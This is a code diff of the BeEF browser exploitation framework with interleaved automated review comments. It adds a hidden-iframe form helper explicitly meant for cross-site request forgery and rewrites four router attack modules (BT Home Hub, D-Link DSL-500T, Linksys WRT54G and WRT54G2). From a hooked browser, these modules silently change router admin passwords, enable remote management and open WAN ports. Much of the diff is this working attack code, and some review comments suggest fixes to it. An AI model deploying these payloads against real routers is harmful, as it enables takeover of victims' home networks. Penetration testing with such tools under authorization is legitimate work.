diff --git a/Rakefile b/Rakefile index 06b2dc27a..4e736b699 100644 --- a/Rakefile +++ b/Rakefile @@ -152,3 +152,23 @@ task :dmg do puts "\nBeEF.dmg created\n" end + +################################ +# Create CDE Package +# This will download and make the CDE Executable and +# gnereate a CDE Package in cde-package + +task :cde do + puts "\nCloning and Making CDE..."; + sh "git clone git://github.com/pgbovine/CDE.git"; + Dir.chdir "CDE"; + sh "make"; + Dir.chdir ".."; + puts "\nCreating CDE Package...\n"; + sh "./CDE/cde ruby beef"; + sleep (1); + puts "\nCleaning Up...\n"; + sh "rm -r CDE"; + puts "\nCDE Package Created...\n"; + end + diff --git a/VERSION b/VERSION index aafd485c3..509c304b2 100644 --- a/VERSION +++ b/VERSION @@ -14,4 +14,4 @@ # limitations under the License. # -0.4.3.4-alpha +0.4.3.5-alpha diff --git a/config.yaml b/config.yaml index 2e8b191a9..440ed3479 100644 --- a/config.yaml +++ b/config.yaml @@ -16,7 +16,7 @@ # BeEF Configuration file beef: - version: '0.4.3.4-alpha' + version: '0.4.3.5-alpha' debug: false restrictions: @@ -32,6 +32,7 @@ beef: port: "3000" # if running behind a nat set the public ip address here #public: "" + #public_port: "" # port setting is experimental dns: "localhost" panel_path: "/ui/panel" hook_file: "/hook.js" diff --git a/core/main/client/dom.js b/core/main/client/dom.js index c27f3bb2b..387b514bf 100644 --- a/core/main/client/dom.js +++ b/core/main/client/dom.js 
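Review bot: The `:cde` task compiles and then runs code fetched by `sh "git clone git://github.com/pgbovine/CDE.git"` over the unauthenticated git:// transport with no pinned revision, so whatever the remote serves at that moment is built and executed on the packaging host; clone over https and check out a known commit, e.g. `sh "git clone https://github.com/pgbovine/CDE.git"` followed by `sh "git -C CDE checkout <PINNED_COMMIT>"`. The bare `Dir.chdir "CDE"` / `Dir.chdir ".."` pair also leaves the process inside CDE/ if `sh "make"` raises, since rake's sh aborts on a non-zero exit; the block form `Dir.chdir("CDE") { sh "make" }` restores the directory either way. The trailing semicolons and `sleep (1)` (space before the parenthesis) are not Ruby style, and "gnereate" in the header comment is a typo.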
@@ -286,10 +286,37 @@ beef.dom = { */ detachApplet: function(id) { $j('#' + id + '').detach(); + }, + + /** + * Create an invisible iFrame with a form inside, and submit it. Useful for XSRF attacks delivered via POST requests. + * @params: {String} action: the form action attribute, where the request will be sent. + * @params: {String} method: HTTP method, usually POST. + * @params: {Array} inputs: an array of inputs to be added to the form (type, name, value). + * example: [{'type':'hidden', 'name':'1', 'value':''} , {'type':'hidden', 'name':'2', 'value':'3'}] + */ + createIframeXsrfForm: function(action, method, inputs){ + var iframeXsrf = beef.dom.createInvisibleIframe(); + + var formXsrf = document.createElement('form'); + formXsrf.setAttribute('action', action); + formXsrf.setAttribute('method', method); + + var input = null; + for (i in inputs){ + var attributes = inputs[i]; + input = document.createElement('input'); + for(key in attributes){ + input.setAttribute(key, attributes[key]); + } + formXsrf.appendChild(input); + } + iframeXsrf.contentWindow.document.body.appendChild(formXsrf); + formXsrf.submit(); + + return iframeXsrf; } - - }; beef.regCmp('beef.dom'); diff --git a/core/main/client/net.js b/core/main/client/net.js index 7266ae3bc..e0700dcdc 100644 --- a/core/main/client/net.js +++ b/core/main/client/net.js @@ -136,7 +136,7 @@ beef.net = { push:function (stream) { //need to implement wait feature here eventually for (var i = 0; i < stream.pc; i++) { - this.request('http', 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null); + this.request(this.port == '443' ? 'https' : 'http', 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null); } }, 
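Review bot: `for (i in inputs)` and `for(key in attributes)` in createIframeXsrfForm declare neither loop variable, so `i` and `key` become implicit globals on the hooked page, and `for...in` over an Array also walks any enumerable properties other scripts on that page have added to Array.prototype. Iterate the array by index and guard the attribute loop with hasOwnProperty, as below. The doc block should read `@param` rather than `@params`, and because createInvisibleIframe is defined outside the hunk, whether `iframeXsrf.contentWindow.document.body` is guaranteed to exist at the point of appendChild cannot be confirmed from here.
```javascript
createIframeXsrfForm: function(action, method, inputs){
    var iframeXsrf = beef.dom.createInvisibleIframe();
    // … unchanged: form element creation and action/method attributes …
    var input = null;
    for (var i = 0; i < inputs.length; i++) {
        var attributes = inputs[i];
        input = document.createElement('input');
        for (var key in attributes) {
            if (attributes.hasOwnProperty(key)) {
                input.setAttribute(key, attributes[key]);
            }
        }
        formXsrf.appendChild(input);
    }
    // … unchanged: append form to the iframe, submit, return iframeXsrf …
```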
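Review bot: `this.port == '443' ? 'https' : 'http'` infers the scheme from the port number, so a listener serving TLS on any other port (or plain HTTP on 443) is addressed with the wrong scheme, and the same port-based rule is repeated in the beefjs.rb hunk of this commit. A single scheme derived from configuration and held on beef.net next to host and port (a new field, say `this.scheme`) and passed here as `this.request(this.scheme, 'GET', this.host, this.port, ...)` would keep the two in step and make the rule changeable in one place.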
@@ -158,8 +158,8 @@ beef.net = { request:function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) { //check if same domain or cross domain var cross_domain = true; - if (document.domain == domain) { - if (document.location.port == "" || document.location.port == null) { + if (document.domain == domain.replace(/(\r\n|\n|\r)/gm,"")) { //strip eventual line breaks + if(document.location.port == "" || document.location.port == null){ cross_domain = !(port == "80" || port == "443"); } } diff --git a/core/main/configuration.rb b/core/main/configuration.rb index c6d7de06f..f2469e0f4 100644 --- a/core/main/configuration.rb +++ b/core/main/configuration.rb @@ -118,7 +118,9 @@ module BeEF # Load module configurations def load_modules_config self.set('beef.module', {}) - Dir.glob("#{$root_dir}/modules/**/*/config.yaml") do | cf | + # support nested sub-categories, like browser/hooked_domain/ajax_fingerprint + module_configs = File.join("#{$root_dir}/modules/**", "config.yaml") + Dir.glob(module_configs) do | cf | y = self.load(cf) if y != nil y['beef']['module'][y['beef']['module'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '') diff --git a/core/main/console/banners.rb b/core/main/console/banners.rb index 40d52b825..3621d20e9 100644 --- a/core/main/console/banners.rb +++ b/core/main/console/banners.rb @@ -92,6 +92,7 @@ module Banners self.interfaces.map do |host| # display the important URLs on each interface from the interfaces array print_success "running on network interface: #{host}" + beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port") data = "Hook URL: http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n" data += "UI URL: http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n" 
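Review bot: `domain.replace(/(\r\n|\n|\r)/gm,"")` throws a TypeError when `domain` is null or undefined, where the previous `document.domain == domain` comparison simply evaluated false; the stripped value is also used only for the comparison while `domain` itself presumably flows into the request unchanged, so a value with embedded line breaks is merely hidden from the same-origin check (the later use is outside the hunk, so this is inferred). Strip once into a local and use it for both, `var clean_domain = (domain || '').replace(/(\r\n|\n|\r)/gm, '');` then `if (document.domain == clean_domain) {`. The new `if(document.location.port ...)` line also dropped the space after `if` that the surrounding code uses. request's body continues outside the hunk.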
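Review bot: `File.join("#{$root_dir}/modules/**", "config.yaml")` interpolates part of the path and joins the rest; the consistent form is `module_configs = File.join($root_dir, 'modules', '**', 'config.yaml')`. With `**` now unbounded, `**/` also matches zero directories, so a stray config.yaml placed directly under modules/ would be loaded as a module — worth confirming that is intended. The context line that sets `path` builds a regex from the unescaped `$root_dir`; a root directory containing regex metacharacters would fail to strip, and `Regexp.escape($root_dir)` avoids that.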
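Review bot: `beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")` is assigned but never read in the visible lines — the Hook URL and UI URL on the next two lines still interpolate `beef.http.port` — and the name says host while the value is a port. Rename it `beef_port` and use it in both URLs, e.g. `data = "Hook URL: http://#{host}:#{beef_port}#{configuration.get("beef.http.hook_file")}\n"`. The same `public_port || port` fallback is duplicated in the server.rb, test_network_request and phonegap_persistence hunks of this commit; a single helper on Configuration would keep them from drifting. The hunk header claims seven new-side lines and six are visible here, so a line may have been lost in rendering.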
diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb index eed479cd6..d43964ff2 100644 --- a/core/main/handlers/modules/beefjs.rb +++ b/core/main/handlers/modules/beefjs.rb @@ -54,6 +54,17 @@ module Modules hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host) end + # @note if http_port <> public_port in config ini, use the public_port + unless hook_session_config['beef_public_port'].nil? + if hook_session_config['beef_port'] != hook_session_config['beef_public_port'] + hook_session_config['beef_port'] = hook_session_config['beef_public_port'] + hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port']) + if hook_session_config['beef_public_port'] == '443' + hook_session_config['beef_url'].sub!(/http:/, 'https:') + end + end + end + # @note populate place holders in the beefjs string and set the response body eruby = Erubis::FastEruby.new(beefjs) @body << eruby.evaluate(hook_session_config) diff --git a/core/main/server.rb b/core/main/server.rb index 86ae23e74..d15ad9198 100644 --- a/core/main/server.rb +++ b/core/main/server.rb @@ -29,7 +29,8 @@ module BeEF def initialize @configuration = BeEF::Core::Configuration.instance beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host") - @url = "http://#{beef_host}:#{@configuration.get("beef.http.port")}" + beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port") + @url = "http://#{beef_host}:#{beef_port}" @root_dir = File.expand_path('../../../', __FILE__) @command_urls = {} @mounts = {} 
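Review bot: The port substitution in the new block is a no-op: `hook_session_config['beef_port'] = hook_session_config['beef_public_port']` runs first, so the following `sub!(/#{hook_session_config['beef_port']}/, ...)` searches for the public port and replaces it with itself, leaving the original port in beef_url. Swap the two statements and anchor the pattern on the colon so a short port cannot match inside the host or a longer port: `hook_session_config['beef_url'].sub!(/:#{Regexp.escape(hook_session_config['beef_port'].to_s)}/, ":#{hook_session_config['beef_public_port']}")` followed by `hook_session_config['beef_port'] = hook_session_config['beef_public_port']`. If beef_url is already built from the public port, as server.rb's `@url` now is in this same commit, the substitution becomes redundant — that depends on how hook_session_config['beef_url'] is populated outside the hunk.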
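Review bot: `@url = "http://#{beef_host}:#{beef_port}"` hardcodes the http scheme even though the beefjs.rb and net.js hunks in this commit switch to https when the public port is 443, so the server's own notion of its URL disagrees with what the hook script is told. Derive the scheme in one place (a configuration setting, or at minimum the same 443 rule) and build `@url = "#{scheme}://#{beef_host}:#{beef_port}"`. initialize continues outside the hunk.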
@@ -44,6 +45,8 @@ module BeEF 'beef_root_dir' => @root_dir, 'beef_host' => @configuration.get('beef.http.host'), 'beef_port' => @configuration.get('beef.http.port'), + 'beef_public' => @configuration.get('beef.http.public'), + 'beef_public_port' => @configuration.get('beef.http.public_port'), 'beef_dns' => @configuration.get('beef.http.dns'), 'beef_hook' => @configuration.get('beef.http.hook_file') } diff --git a/extensions/demos/html/basic.html b/extensions/demos/html/basic.html index 57cc03802..f058afc95 100644 --- a/extensions/demos/html/basic.html +++ b/extensions/demos/html/basic.html @@ -15,12 +15,12 @@

- These links are for demonstrating the "collect links" command module
+ These links are for demonstrating the "Get Page HREFs" command module

diff --git a/install-beef b/install-beef new file mode 100644 index 000000000..2c2401b20 --- /dev/null +++ b/install-beef 
@@ -0,0 +1,147 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +clear +echo "======================================" +echo " BeEF Installer " +echo "======================================" +echo "" +echo "Detecting OS.."; + + +OS=`uname` + +if [ "${OS}" = "Linux" ] ; then + if [ -f /etc/redhat-release ] ; then + Distro='RedHat' + elif [ -f /etc/debian_version ] ; then + Distro='Debian' + fi + readonly OS + readonly Distro +fi + +if [ "$OS" == "Darwin" ]; then + echo "Mac OSX Detected" + echo "Installing Ruby Version Manager (RVM) & Ruby 1.9.3.." + bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) + source ~/.bash_login + rvm install 1.9.3-p0 --with-gcc=clang + rvm use 1.9.3-p0 + echo "" + echo "Downloading BeEF.." + + git clone git://github.com/beefproject/beef.git + cd beef + + echo "" + echo "Installing Ruby Gems.." + bundle install + OK="yes" + + cd beef + ./beef + + echo "" + echo "==========================================" + echo " Install Complete" + echo "Please restart Terminal and Run BeEF with:" + echo " $ ./beef " + echo "==========================================" + echo "" + +fi + +if [ "$Distro" == "Debian" ]; then + echo "Debian/Ubuntu Detected" + echo "Installing Prerequisite Packages.." 
+ sudo apt-get update + sudo apt-get install ruby1.9.1-dev build-essential libsqlite3-ruby libsqlite3-dev build-essential libsqlite3-ruby git libsqlite3-dev rake + + echo "Downloading BeEF.." + git clone git://github.com/beefproject/beef.git + cd beef + + echo "Installing Ruby Gems" + sudo gem install bundler + sudo bundle install + + cd beef + ./beef + + OK="yes" + echo "" + echo "==========================================" + echo " Install Complete" + echo "==========================================" + echo "" +fi + + +if [ "$Distro" == "RedHat" ]; then + echo "Redhat/Fedora Detected" + echo "Installing Prerequisite Packages.." + sudo yum install -y git make gcc openssl-devel gcc-c++ patch readline readline-devel zlib zlib-devel libyaml-devel libffi-devel bzip2 autoconf automake libtool bison iconv-devel sqlite-devel + + echo "" + echo "Installing Ruby Version Manager (RVM) & Ruby 1.9.2" + wget https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer + bash ./rvm-installer + source ~/.rvm/scripts/rvm + rvm pkg install openssl + rvm install 1.9.2 --with-openssl-dir=$rvm_path/usr + source ~/.rvm/scripts/rvm + rvm use 1.9.2 --default + + echo "Downloading BeEF.." + git clone git://github.com/beefproject/beef.git + cd beef + + gem install bundler + bundle + + source ~/.bash_profile + + cd beef + ./beef + + OK="yes" + echo "" + echo "==========================================" + echo " Install Complete" + echo "==========================================" + echo "" + +fi + +if [ "$OK" == "yes" ]; then + +else + echo "" + echo "=======================================" + echo " Install Failed" + echo "Unable to locate installer for your OS:" + echo $OS + echo $Distro + echo "=======================================" + echo "" +fi + + + + + + diff --git a/modules/debug/test_network_request/module.rb b/modules/debug/test_network_request/module.rb index e649dbdaa..e4de490dd 100644 --- a/modules/debug/test_network_request/module.rb 
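Review bot: `if [ "$OK" == "yes" ]; then` is followed directly by `else` with no command in between, which bash rejects as a syntax error when it reaches that block, so the script dies only after the installs above it have already run; invert the test and drop the else branch: `if [ "$OK" != "yes" ]; then` … `fi`. The file has no shebang yet relies on bash-only syntax (`==` inside `[ ]`, `< <(...)`), so `#!/usr/bin/env bash` should be the first line. Each branch also runs an installer fetched at execution time without any integrity check (`bash -s stable < <(curl -s ...)`, `bash ./rvm-installer`) and clones over unauthenticated git://; pinning a release, verifying a checksum or signature before executing it, and cloning over https limit what a tampered download can do on the host. The second `cd beef` in each branch appears to run from inside the just-cloned beef directory and will fail unless a nested beef/ exists there.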
+++ b/modules/debug/test_network_request/module.rb @@ -24,7 +24,7 @@ class Test_network_request < BeEF::Core::Command def self.options @configuration = BeEF::Core::Configuration.instance beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host") - beef_port = @configuration.get("beef.http.port") + beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port") return [ {'name' => 'scheme', 'ui_label'=>'Scheme', 'type' => 'text', 'width' => '400px', 'value' => 'http' }, diff --git a/modules/hooked_domain/ajax_fingerprint/config.yaml b/modules/hooked_domain/ajax_fingerprint/config.yaml index 32e2c3156..b1cd1b6ce 100644 --- a/modules/hooked_domain/ajax_fingerprint/config.yaml +++ b/modules/hooked_domain/ajax_fingerprint/config.yaml @@ -17,8 +17,8 @@ beef: module: ajax_fingerprint: enable: true - category: "Host" - name: "Hooked Domain" + category: "Hooked Domain" + name: "Fingerprint Ajax" description: "Fingerprint Ajax and JS libraries present on the hooked page." authors: ["qswain"] target: diff --git a/modules/phonegap/phonegap_persistence/module.rb b/modules/phonegap/phonegap_persistence/module.rb index 909014fe2..30face23d 100644 --- a/modules/phonegap/phonegap_persistence/module.rb +++ b/modules/phonegap/phonegap_persistence/module.rb @@ -22,7 +22,7 @@ class Phonegap_persistence < BeEF::Core::Command @configuration = BeEF::Core::Configuration.instance beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host") - beef_port = @configuration.get("beef.http.port") + beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port") return [{ 'name' => 'hook_url', diff --git a/modules/router/bt_home_hub_csrf/command.js b/modules/router/bt_home_hub_csrf/command.js index 1537d8d09..d20374dbe 100644 --- a/modules/router/bt_home_hub_csrf/command.js +++ b/modules/router/bt_home_hub_csrf/command.js 
@@ -17,39 +17,16 @@ beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; - var bt_home_hub_iframe = beef.dom.createInvisibleIframe(); - var form = document.createElement('form'); - form.setAttribute('action', gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5"); - form.setAttribute('method', 'post'); - var input = null; - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', '0'); - input.setAttribute('value', '31'); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', '1'); - input.setAttribute('value', ''); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', '30'); - input.setAttribute('value', passwd); - form.appendChild(input); - - bt_home_hub_iframe.contentWindow.document.body.appendChild(form); - form.submit(); + var bt_home_hub_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST", + [{'type':'hidden', 'name':'0', 'value':'31'} , + {'type':'hidden', 'name':'1', 'value':''}, + {'type':'hidden', 'name':'30', 'value':passwd}]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - delete form; document.body.removeChild(bt_home_hub_iframe); } setTimeout("cleanup()", 15000); diff --git a/modules/router/dlink_dsl500t_csrf/command.js b/modules/router/dlink_dsl500t_csrf/command.js index 8616d5acf..ae1c98e23 100644 --- a/modules/router/dlink_dsl500t_csrf/command.js +++ b/modules/router/dlink_dsl500t_csrf/command.js 
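Review bot: With the form building moved into `beef.dom.createIframeXsrfForm`, the only code this module still writes by hand is the teardown, and it keeps `cleanup = function() {...}` as an undeclared global and `setTimeout("cleanup()", 15000)` in its string form, which is an implicit eval; declare it locally and pass the function reference: `var cleanup = function() { document.body.removeChild(bt_home_hub_iframe); };` and `setTimeout(cleanup, 15000);`. Removing the iframe from document.body assumes createInvisibleIframe appended it there, which is defined outside the hunk. The dlink_dsl500t_csrf, linksys_wrt54g2_csrf and linksys_wrt54g_csrf hunks end before their teardown code, so whether they share this pattern cannot be checked here.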
@@ -17,48 +17,13 @@ beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; - var target = gateway + "/cgi-bin/webcm"; - - var dsl500t_iframe = beef.dom.createInvisibleIframe(); - - var form = document.createElement('form'); - form.setAttribute('action', target); - form.setAttribute('method', 'post'); - - var input = null; - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'getpage'); - input.setAttribute('value', '../html/tools/usrmgmt.htm'); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'security:settings/username'); - input.setAttribute('value', 'admin'); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'security:settings/password'); - input.setAttribute('value', passwd); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'security:settings/password_confirm'); - input.setAttribute('value', passwd); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'security:settings/idle_timeout'); - input.setAttribute('value', '30'); - form.appendChild(input); - - dsl500t_iframe.contentWindow.document.body.appendChild(form); - form.submit(); + var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi-bin/webcm", "POST", + [{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} , + {'type':'hidden', 'name':'security:settings/username', 'value':'admin'}, + {'type':'hidden', 'name':'security:settings/password', 'value':passwd}, + {'type':'hidden', 'name':'security:settings/password_confirm', 'value':passwd}, + {'type':'hidden', 'name':'security:settings/idle_timeout', 'value':'30'} + ]); 
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); diff --git a/modules/router/linksys_wrt54g2_csrf/command.js b/modules/router/linksys_wrt54g2_csrf/command.js index 036a25aab..0f362bf89 100644 --- a/modules/router/linksys_wrt54g2_csrf/command.js +++ b/modules/router/linksys_wrt54g2_csrf/command.js 
@@ -18,90 +18,20 @@ beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; - var target = gateway + "Manage.tri"; - - var wrt54g2_iframe = beef.dom.createInvisibleIframe(); - - var form = document.createElement('form'); - form.setAttribute('action', target); - form.setAttribute('method', 'post'); - - var input = null; - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'MANAGE_USE_HTTP'); - input.setAttribute('value', 0); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'MANAGE_HTTP'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'MANAGE_HTTP_S'); - input.setAttribute('value', 0); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'MANAGE_PASSWORDMOD'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'MANAGE_PASSWORD'); - input.setAttribute('value', passwd); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'MANAGE_PASSWORD_CONFIRM'); - input.setAttribute('value', passwd); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', '_http_enable'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'MANAGE_WLFILTER'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 
'hidden'); - input.setAttribute('name', 'MANAGE_REMOTE'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'MANAGE_PORT'); - input.setAttribute('value', port); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'MANAGE_UPNP'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'layout'); - input.setAttribute('value', 'en'); - form.appendChild(input); - - wrt54g2_iframe.contentWindow.document.body.appendChild(form); - form.submit(); + var wrt54g2_iframe = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST", + [{'type':'hidden', 'name':'MANAGE_USE_HTTP', 'value':'0'} , + {'type':'hidden', 'name':'MANAGE_HTTP', 'value':'1'}, + {'type':'hidden', 'name':'MANAGE_HTTP_S', 'value':'0'}, + {'type':'hidden', 'name':'MANAGE_PASSWORDMOD', 'value':'1'}, + {'type':'hidden', 'name':'MANAGE_PASSWORD', 'value':passwd}, + {'type':'hidden', 'name':'MANAGE_PASSWORD_CONFIRM', 'value':passwd}, + {'type':'hidden', 'name':'_http_enable', 'value':'1'}, + {'type':'hidden', 'name':'MANAGE_WLFILTER', 'value':'1'}, + {'type':'hidden', 'name':'MANAGE_REMOTE', 'value':'1'}, + {'type':'hidden', 'name':'MANAGE_PORT', 'value':port}, + {'type':'hidden', 'name':'MANAGE_UPNP', 'value':'1'}, + {'type':'hidden', 'name':'layout', 'value':'en'} + ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); diff --git a/modules/router/linksys_wrt54g_csrf/command.js b/modules/router/linksys_wrt54g_csrf/command.js index 456922d35..d18e65898 100644 --- a/modules/router/linksys_wrt54g_csrf/command.js +++ b/modules/router/linksys_wrt54g_csrf/command.js 
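Review bot: `{'type':'hidden', 'name':'MANAGE_PORT', 'value':port}` reads `port`, which is not declared anywhere in the hunk — only `gateway` and `passwd` are assigned from the template — so unless it is defined elsewhere in the file this throws a ReferenceError before the form is built; if the module passes a port as a template variable, declare it beside gateway and passwd the same way, otherwise drop the entry. The same reference appears in the linksys_wrt54g_csrf hunk (`'name':'http_wanport', 'value':port`), which runs past the end of this page. Switching the numeric values to strings (`'0'`, `'1'`) is harmless since setAttribute stringifies either way. The stray ` ,` after the first array entry in each of these calls is a spacing oddity worth normalising.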
@@ -18,90 +18,20 @@ beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; - var target = gateway + "manage.tri"; - - var wrt54g_iframe = beef.dom.createInvisibleIframe(); - - var form = document.createElement('form'); - form.setAttribute('action', target); - form.setAttribute('method', 'post'); - - var input = null; - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'remote_mgt_https'); - input.setAttribute('value', 0); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'http_enable'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'https_enable'); - input.setAttribute('value', 0); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'PasswdModify'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'http_passwd'); - input.setAttribute('value', passwd); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'http_passwdConfirm'); - input.setAttribute('value', passwd); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', '_http_enable'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'web_wl_filter'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - 
input.setAttribute('name', 'remote_management'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'http_wanport'); - input.setAttribute('value', port); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'upnp_enable'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'layout'); - input.setAttribute('value', 'en'); - form.appendChild(input); - - wrt54g_iframe.contentWindow.document.body.appendChild(form); - form.submit(); + var wrt54g_iframe = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST", + [{'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} , + {'type':'hidden', 'name':'http_enable', 'value':'1'}, + {'type':'hidden', 'name':'https_enable', 'value':'0'}, + {'type':'hidden', 'name':'PasswdModify', 'value':'1'}, + {'type':'hidden', 'name':'http_passwd', 'value':passwd}, + {'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd}, + {'type':'hidden', 'name':'_http_enable', 'value':'1'}, + {'type':'hidden', 'name':'remote_management', 'value':'1'}, + {'type':'hidden', 'name':'web_wl_filter', 'value':'1'}, + {'type':'hidden', 'name':'http_wanport', 'value':port}, + {'type':'hidden', 'name':'upnp_enable', 'value':'1'}, + {'type':'hidden', 'name':'layout', 'value':'en'} + ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");